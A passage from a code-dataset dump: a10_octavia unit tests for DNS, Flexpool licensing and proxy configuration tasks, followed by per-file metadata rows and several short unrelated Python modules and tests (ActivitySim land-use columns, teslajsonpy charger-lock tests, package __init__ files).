log_message = str("No vthunder therefore dns cannot be assigned.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
dns_task.execute(None)
self.assertEqual(expected_log, cm.output)
def test_DNSConfiguration_execute_no_network_id_warn(self):
vthunder = copy.deepcopy(VTHUNDER)
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No networks were configured therefore "
"nameservers cannot be set on the "
"vThunder-Amphora {}").format(a10constants.MOCK_VTHUNDER_ID)
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
dns_task.execute(vthunder)
self.assertEqual(expected_log, cm.output)
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_no_dns(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
self.client_mock.dns.set.assert_not_called()
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_license_net_primary_only(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id, primary_dns=PRIMARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, None))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_with_primary_secondary(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_network_dns(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = [PRIMARY_DNS, SECONDARY_DNS]
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_too_many_network_dns_warn(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = [PRIMARY_DNS, SECONDARY_DNS, '3.3.3.3']
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = ("More than one DNS nameserver detected on subnet {}. "
"Using {} as primary and {} as secondary.".format(
DNS_SUBNET.id, PRIMARY_DNS, SECONDARY_DNS))
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
dns_task.execute(vthunder)
self.assertEqual(expected_log, cm.output)
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_amp_mgmt_net(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_use_first_amp_boot_net(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_boot_network_list=[DNS_NETWORK.id, 'random-net'])
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_config_precedence(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
primary_dns=PRIMARY_DNS, secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = ['8.8.8.8', '8.8.4.4']
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_flavor_dns(self, network_driver_mock):
flavor = {'dns': {'primary-dns': PRIMARY_DNS, 'secondary-dns': SECONDARY_DNS}}
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder, flavor)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_flavor_dns_precedence(self, network_driver_mock):
flavor = {'dns': {'primary-dns': PRIMARY_DNS, 'secondary-dns': SECONDARY_DNS}}
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
primary_dns='1.0.1.0', secondary_dns='0.1.0.1')
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
dns_subnet = copy.deepcopy(DNS_SUBNET).to_dict()
dns_subnet['dns_nameservers'] = ['8.8.8.8', '8.8.4.4']
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = dns_subnet
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder, flavor)
args, kwargs = self.client_mock.dns.set.call_args
self.assertEqual(args, (PRIMARY_DNS, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_execute_with_secondary_fail(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
self.assertRaises(a10_ex.PrimaryDNSMissing, dns_task.execute, vthunder)
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_revert_delete_dns(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
secondary_dns=SECONDARY_DNS)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.revert(vthunder)
args, kwargs = self.client_mock.dns.delete.call_args
self.assertEqual(args, (None, SECONDARY_DNS))
@mock.patch('a10_octavia.controller.worker.tasks.glm_tasks.DNSConfiguration.network_driver')
def test_DNSConfiguration_revert_no_dns_return(self, network_driver_mock):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id)
vthunder = copy.deepcopy(VTHUNDER)
dns_net = copy.deepcopy(DNS_NETWORK)
network_driver_mock.get_network.return_value = dns_net
network_driver_mock.show_subnet_detailed.return_value = copy.deepcopy(DNS_SUBNET).to_dict()
dns_task = task.DNSConfiguration()
dns_task.axapi_client = self.client_mock
dns_task.execute(vthunder)
self.client_mock.dns.delete.assert_not_called()
def test_ActivateFlexpoolLicense_execute_no_vthunder_warn(self):
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore licensing cannot occur.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
flexpool_task.execute(None, None)
self.assertEqual(expected_log, cm.output)
def _template_glm_call(self):
expected_call = {
'token': a10constants.MOCK_FLEXPOOL_TOKEN,
'burst': False,
'enable_requests': True,
'interval': None,
'port': 443,
'allocate_bandwidth': None,
'use_mgmt_port': False
}
return expected_call
def test_ActivateFlexpoolLicense_execute_success(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
flexpool_token=a10constants.MOCK_FLEXPOOL_TOKEN)
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
interfaces = {
'interface': {
'ethernet-list': []
}
}
expected_call = self._template_glm_call()
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.axapi_client.interface.get_list.return_value = interfaces
flexpool_task.execute(vthunder, amphora)
args, kwargs = self.client_mock.glm.create.call_args
self.assertEqual(kwargs, expected_call)
def test_ActivateFlexpoolLicense_execute_use_mgmt_port(self):
self.conf.config(group=a10constants.A10_CONTROLLER_WORKER_CONF_SECTION,
amp_mgmt_network=DNS_NETWORK.id)
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
flexpool_token=a10constants.MOCK_FLEXPOOL_TOKEN)
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
interfaces = {
'interface': {
'ethernet-list': []
}
}
expected_call = self._template_glm_call()
expected_call['use_mgmt_port'] = True
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.axapi_client.interface.get_list.return_value = interfaces
flexpool_task.execute(vthunder, amphora)
args, kwargs = self.client_mock.glm.create.call_args
self.assertEqual(kwargs, expected_call)
def test_ActivateFlexpoolLicense_execute_iface_up(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
amp_license_network=DNS_NETWORK.id,
flexpool_token=a10constants.MOCK_FLEXPOOL_TOKEN)
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
interfaces = {
'interface': {
'ethernet-list': [{
'ifnum': 2,
'action': 'disable'
}]
}
}
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.axapi_client.interface.get_list.return_value = interfaces
flexpool_task.execute(vthunder, amphora)
self.client_mock.system.action.setInterface.assert_called_with(2)
def test_ActivateFlexpoolLicense_revert_deactivate_license(self):
vthunder = copy.deepcopy(VTHUNDER)
amphora = copy.deepcopy(AMPHORA)
flexpool_task = task.ActivateFlexpoolLicense()
flexpool_task.axapi_client = self.client_mock
flexpool_task.revert(vthunder, amphora)
self.client_mock.delete.glm_license.post.assert_called()
def test_RevokeFlexpoolLicense_execute_success(self):
vthunder = copy.deepcopy(VTHUNDER)
revoke_task = task.RevokeFlexpoolLicense()
revoke_task.axapi_client = self.client_mock
revoke_task.execute(vthunder)
self.client_mock.delete.glm_license.post.assert_called()
def test_RevokeFlexpoolLicense_execute_no_vthunder_warn(self):
revoke_task = task.RevokeFlexpoolLicense()
revoke_task.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore license revocation cannot occur.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
revoke_task.execute(None)
self.assertEqual(expected_log, cm.output)
def test_ConfigureForwardProxyServer_execute_success(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
proxy_host=PROXY_HOST, proxy_port=PROXY_PORT,
proxy_username=PROXY_USERNAME, proxy_password=PROXY_PASSWORD,
proxy_secret_string=PROXY_PASSWORD_VALUE)
vthunder = copy.deepcopy(VTHUNDER)
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
proxy_server.execute(vthunder)
self.client_mock.glm.proxy_server.create.assert_called()
def test_ConfigureForwardProxyServer_execute_flavor_success(self):
flavor = {
'glm-proxy-server': {
'proxy_host': PROXY_HOST,
'proxy_port': PROXY_PORT,
'proxy_username': PROXY_USERNAME,
'proxy_password': PROXY_PASSWORD,
'proxy_secret_string': PROXY_PASSWORD_VALUE
}
}
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
proxy_host="10.10.10.11", proxy_port=8888,
proxy_username='configuser', proxy_password=False,
proxy_secret_string='configpwrd')
vthunder = copy.deepcopy(VTHUNDER)
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
proxy_server.execute(vthunder, flavor)
self.client_mock.glm.proxy_server.create.assert_called_with(**{'host': PROXY_HOST,
'port': PROXY_PORT,
'username': PROXY_USERNAME,
'password': PROXY_PASSWORD,
'secret_string':
PROXY_PASSWORD_VALUE})
def test_ConfigureForwardProxyServer_execute_no_vthunder_warn(self):
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
task_path = "a10_octavia.controller.worker.tasks.glm_tasks"
log_message = str("No vthunder therefore forward proxy server cannot be configured.")
expected_log = ["WARNING:{}:{}".format(task_path, log_message)]
with self.assertLogs(task_path, level='WARN') as cm:
proxy_server.execute(None, None)
self.assertEqual(expected_log, cm.output)
def test_ConfigureForwardProxyServer_execute_no_proxy_conf(self):
self.conf.config(group=a10constants.GLM_LICENSE_CONFIG_SECTION,
proxy_host=None, proxy_port=None)
vthunder = copy.deepcopy(VTHUNDER)
proxy_server = task.ConfigureForwardProxyServer()
proxy_server.axapi_client = self.client_mock
proxy_server.execute(vthunder)
self.client_mock.glm.proxy_server.create.assert_not_called()
| 49.417537 | 99 | 0.691268 | 2,799 | 23,671 | 5.508039 | 0.087531 | 0.040475 | 0.041772 | 0.035415 | 0.824609 | 0.78861 | 0.780372 | 0.775508 | 0.772005 | 0.768632 | 0 | 0.011544 | 0.224198 | 23,671 | 478 | 100 | 49.520921 | 0.827979 | 0.024418 | 0 | 0.641089 | 0 | 0 | 0.102401 | 0.058286 | 0 | 0 | 0 | 0 | 0.079208 | 1 | 0.071782 | false | 0.022277 | 0.039604 | 0 | 0.116337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bc860f2292fe5e8a47c46c7aa9e3b8a814076c40 | 40 | py | Python | Mesh/util/numpy_ext/__init__.py | ys-warble/Mesh | 115e7391d19ea09db3c627d8b8ed90b3e3bef9b5 | [
"MIT"
] | null | null | null | Mesh/util/numpy_ext/__init__.py | ys-warble/Mesh | 115e7391d19ea09db3c627d8b8ed90b3e3bef9b5 | [
"MIT"
] | 2 | 2019-02-25T00:10:15.000Z | 2019-03-22T20:13:32.000Z | Mesh/util/numpy_ext/__init__.py | ys-warble/Mesh | 115e7391d19ea09db3c627d8b8ed90b3e3bef9b5 | [
"MIT"
] | null | null | null | import Mesh.util.numpy_ext.char as char
| 20 | 39 | 0.825 | 8 | 40 | 4 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 40 | 1 | 40 | 40 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bce1866f0685e2d6a625544b9f45364d06777206 | 188 | py | Python | src/compas/numerical/algorithms/__init__.py | philianeles/compas | 129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1 | [
"MIT"
] | null | null | null | src/compas/numerical/algorithms/__init__.py | philianeles/compas | 129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1 | [
"MIT"
] | null | null | null | src/compas/numerical/algorithms/__init__.py | philianeles/compas | 129a5a7e9d8832495d2bbee6ce7c6463ab50f2d1 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from .pca_numpy import *
from .topop_numpy import *
from .pca_numpy import __all__ as a7
from .topop_numpy import __all__ as a8
__all__ = a7 + a8
| 18.8 | 38 | 0.787234 | 30 | 188 | 4.233333 | 0.366667 | 0.346457 | 0.204724 | 0.283465 | 0.377953 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.170213 | 188 | 9 | 39 | 20.888889 | 0.788462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4c1be44c485f48a41f2e487500e840b021875875 | 1,096 | py | Python | activitysim/activitysim/abm/test/extensions/landuse.py | ual/DOE-repo-deliverable | 4bafdd9a702a9a6466dd32ae62f440644d735d3c | [
"BSD-3-Clause"
] | null | null | null | activitysim/activitysim/abm/test/extensions/landuse.py | ual/DOE-repo-deliverable | 4bafdd9a702a9a6466dd32ae62f440644d735d3c | [
"BSD-3-Clause"
] | null | null | null | activitysim/activitysim/abm/test/extensions/landuse.py | ual/DOE-repo-deliverable | 4bafdd9a702a9a6466dd32ae62f440644d735d3c | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import pandas as pd
import orca
@orca.column("land_use")
def total_households(land_use):
return land_use.local.TOTHH
@orca.column("land_use")
def total_employment(land_use):
return land_use.local.TOTEMP
@orca.column("land_use")
def total_acres(land_use):
return land_use.local.TOTACRE
@orca.column("land_use")
def county_id(land_use):
return land_use.local.COUNTY
@orca.column("land_use")
def household_density(land_use):
return land_use.total_households / land_use.total_acres
@orca.column("land_use")
def employment_density(land_use):
return land_use.total_employment / land_use.total_acres
@orca.column("land_use")
def density_index(land_use):
# FIXME - avoid div by 0
return (land_use.household_density * land_use.employment_density) / \
(land_use.household_density + land_use.employment_density).clip(lower=1)
@orca.column("land_use")
def county_name(land_use, settings):
assert "county_map" in settings
inv_map = {v: k for k, v in settings["county_map"].items()}
return land_use.county_id.map(inv_map)
| 22.367347 | 80 | 0.75 | 171 | 1,096 | 4.51462 | 0.251462 | 0.262953 | 0.145078 | 0.176166 | 0.620466 | 0.59456 | 0.300518 | 0.217617 | 0.095855 | 0 | 0 | 0.002116 | 0.137774 | 1,096 | 48 | 81 | 22.833333 | 0.814815 | 0.020073 | 0 | 0.266667 | 0 | 0 | 0.078358 | 0 | 0 | 0 | 0 | 0.020833 | 0.033333 | 1 | 0.266667 | false | 0 | 0.1 | 0.233333 | 0.633333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
4c3545afe54add9b8968863d4a6597edcb7e14de | 2,897 | py | Python | tests/unit_tests/test_charger_lock.py | hobbe/teslajsonpy | 1d185a13ddf8024d74bd7a6bec5d798ca0270f61 | [
"Apache-2.0"
] | null | null | null | tests/unit_tests/test_charger_lock.py | hobbe/teslajsonpy | 1d185a13ddf8024d74bd7a6bec5d798ca0270f61 | [
"Apache-2.0"
] | null | null | null | tests/unit_tests/test_charger_lock.py | hobbe/teslajsonpy | 1d185a13ddf8024d74bd7a6bec5d798ca0270f61 | [
"Apache-2.0"
] | null | null | null | """Test charger lock."""
import pytest
from tests.tesla_mock import TeslaMock
from teslajsonpy.controller import Controller
from teslajsonpy.lock import ChargerLock
def test_has_battery(monkeypatch):
"""Test has_battery()."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_lock = ChargerLock(_data, _controller)
assert not _lock.has_battery()
def test_is_locked_on_init(monkeypatch):
"""Test is_locked() after initialization."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_lock = ChargerLock(_data, _controller)
assert not _lock is None
assert not _lock.is_locked()
@pytest.mark.asyncio
async def test_is_locked_after_update(monkeypatch):
"""Test is_locked() after an update."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = True
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
assert not _lock is None
assert _lock.is_locked()
@pytest.mark.asyncio
async def test_lock(monkeypatch):
"""Test lock()."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = False
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.lock()
assert not _lock is None
assert _lock.is_locked()
@pytest.mark.asyncio
async def test_lock_already_locked(monkeypatch):
"""Test lock() when already locked."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = True
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.lock()
assert not _lock is None
assert _lock.is_locked()
@pytest.mark.asyncio
async def test_unlock(monkeypatch):
"""Test unlock()."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = True
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.unlock()
assert not _lock is None
assert not _lock.is_locked()
@pytest.mark.asyncio
async def test_unlock_already_unlocked(monkeypatch):
"""Test unlock() when already unlocked."""
_mock = TeslaMock(monkeypatch)
_controller = Controller(None)
_data = _mock.data_request_vehicle()
_data["charge_state"]["charge_port_door_open"] = False
_lock = ChargerLock(_data, _controller)
await _lock.async_update()
await _lock.unlock()
assert not _lock is None
assert not _lock.is_locked()
| 23.552846 | 58 | 0.713842 | 347 | 2,897 | 5.544669 | 0.132565 | 0.037422 | 0.067568 | 0.070166 | 0.794699 | 0.765593 | 0.765593 | 0.765593 | 0.765593 | 0.765593 | 0 | 0 | 0.182603 | 2,897 | 122 | 59 | 23.745902 | 0.8125 | 0.026579 | 0 | 0.830986 | 0 | 0 | 0.062335 | 0.039668 | 0 | 0 | 0 | 0 | 0.183099 | 1 | 0.028169 | false | 0 | 0.056338 | 0 | 0.084507 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4c4cdc8f79352577dbc78afdb200c245ea17167f | 91 | py | Python | backend/beedare/landing/__init__.py | gijs3ntius/BeeDare | 9ad5a93dad9b531b332aeb58f9b97e98585bc1ac | [
"Apache-2.0"
] | 5 | 2018-07-12T11:59:17.000Z | 2021-11-17T19:01:15.000Z | backend/beedare/landing/__init__.py | gijs3ntius/BeeDare | 9ad5a93dad9b531b332aeb58f9b97e98585bc1ac | [
"Apache-2.0"
] | 17 | 2020-06-05T18:27:11.000Z | 2022-03-11T23:24:50.000Z | backend/beedare/landing/__init__.py | gijsentius/BeeDare | 9ad5a93dad9b531b332aeb58f9b97e98585bc1ac | [
"Apache-2.0"
] | 1 | 2020-02-25T13:57:47.000Z | 2020-02-25T13:57:47.000Z | from flask import Blueprint
landing = Blueprint('landing', __name__)
from . import views
| 15.166667 | 40 | 0.769231 | 11 | 91 | 6 | 0.636364 | 0.484848 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 91 | 5 | 41 | 18.2 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
4c6a3595e39a5cafbfb0cff0963a9abb789505dc | 168 | py | Python | lib/JumpScale/lib/lxc/__init__.py | jumpscale7/jumpscale_core7 | c3115656214cab1bd32f7a1e092c0bffc84a00cd | [
"Apache-2.0"
] | null | null | null | lib/JumpScale/lib/lxc/__init__.py | jumpscale7/jumpscale_core7 | c3115656214cab1bd32f7a1e092c0bffc84a00cd | [
"Apache-2.0"
] | 4 | 2016-08-25T12:08:39.000Z | 2018-04-12T12:36:01.000Z | lib/JumpScale/lib/lxc/__init__.py | jumpscale7/jumpscale_core7 | c3115656214cab1bd32f7a1e092c0bffc84a00cd | [
"Apache-2.0"
] | 3 | 2016-03-08T07:49:34.000Z | 2018-10-19T13:56:43.000Z | from JumpScale import j
def cb():
from .Lxc import Lxc
return Lxc()
j.base.loader.makeAvailable(j, 'system.platform')
j.system.platform._register('lxc', cb)
